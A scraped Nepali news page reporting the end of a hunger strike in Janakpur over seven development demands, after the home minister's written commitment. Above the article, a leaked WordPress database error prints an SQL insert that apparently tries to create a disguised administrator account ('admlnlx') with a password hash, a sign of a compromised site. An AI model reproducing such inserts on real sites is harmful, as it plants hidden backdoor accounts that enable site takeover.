WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz0zEqC4A3kJQHMSfqxk55FojyU0Vd1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:17:05', '', 'admlnlx', 'admlnlx')
जनकपुर, फाल्गुन ६ –
आधुनिक जनकपुर निर्माणको माग गर्दै गएको १६ दिनदेखि आमरण अनशनमा बस्नुभएका बृहतर जनकपुर क्षेत्र विकास परिषदका अध्यक्ष रामकुमार शर्मा लगायत तीन जनाले शुक्रबार अनसन तोडेका छन् ।
सरकारको तर्फबाट उपप्रधान तथा गृह मन्त्री बिमलेन्द्र निधिले आमरण अनशनरतहरुको माग कार्यान्वयनका लागि तीन दिनभित्र सरोकारवाला मान्त्रलयहरुको सचिवस्तरीय एक समिति गठन गरि कार्यान्वयन गर्ने लिखित प्रतिबद्धता जनाएपछि शर्मालगायत तीन जनाले बिधिबतरुपमा अनसन तोडेका हुन् ।
धार्मिक तथा ऐतिहासिक महत्व रहेपनि विकास निर्माणमा पछि परेको जनकपुरलाई आधुनिक शहरको रुपा विकशित गर्नुपर्ने, जनकपुर अञ्चल अस्पताललाई सुविधा सम्पन्न ५ सय सैयाको बनाउनु पर्ने, वर्षौंदेखि अलपत्र अबस्थामा रहेका मनिपाल शिक्षण अस्पतालको अधुरा काम पूरा गर्नुपर्ने, जनकपुर विमानस्थललाई क्षेत्रीयस्तरको बनाउनु पर्ने लगायतका सात बुँदे माग राख्दै शर्माका साथै नयाँ शक्ति नेपाल प्रदेश नम्बर २ का संयोजक कलामुदिन राईन र महोत्तरी जिल्लाका स्थानीय मिथलेश्वर दाश आमरण अनसनमा बस्नु भएको थियो ।